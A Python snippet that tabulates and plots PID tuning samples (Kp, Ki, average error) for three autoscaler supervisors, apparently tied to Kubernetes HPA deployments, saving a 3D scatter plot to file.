H1_Data = {
'time': supervisors[0].timestampAudit,
'Kp': supervisors[0].pValues,
'Ki': supervisors[0].iValues,
'avg_error': supervisors[0].avgErrors,
}
h1_df = pd.DataFrame(H1_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[0].hpa.deploymentLabel}")
print(h1_df)
H2_Data = {
'time': supervisors[1].timestampAudit,
'Kp': supervisors[1].pValues,
'Ki': supervisors[1].iValues,
'avg_error': supervisors[1].avgErrors
}
h2_df = pd.DataFrame(H2_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[1].hpa.deploymentLabel}")
print(h2_df)
H3_Data = {
'time': supervisors[2].timestampAudit,
'Kp': supervisors[2].pValues,
'Ki': supervisors[2].iValues,
'avg_error': supervisors[2].avgErrors
}
h3_df = pd.DataFrame(H3_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[2].hpa.deploymentLabel}")
print(h3_df)
fig, ((h1, h2, h3)) = plt.subplots(1,3, subplot_kw={"projection": "3d"}, figsize=(16, 8))
h1.scatter(h1_df['Kp'], h1_df['Ki'], h1_df['avg_error'], color='blue')
h1.set_xlabel('Kp')
h1.set_ylabel('Ki')
h1.set_zlabel('avg_error')
h2.scatter(h2_df['Kp'], h2_df['Ki'], h2_df['avg_error'], color='blue')
h2.set_xlabel('Kp')
h2.set_ylabel('Ki')
h2.set_zlabel('avg_error')
h3.scatter(h3_df['Kp'], h3_df['Ki'], h3_df['avg_error'], color='blue')
h3.set_xlabel('Kp')
h3.set_ylabel('Ki')
h3.set_zlabel('avg_error')
plt.savefig(f'graph/{SEED}_errors.png')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.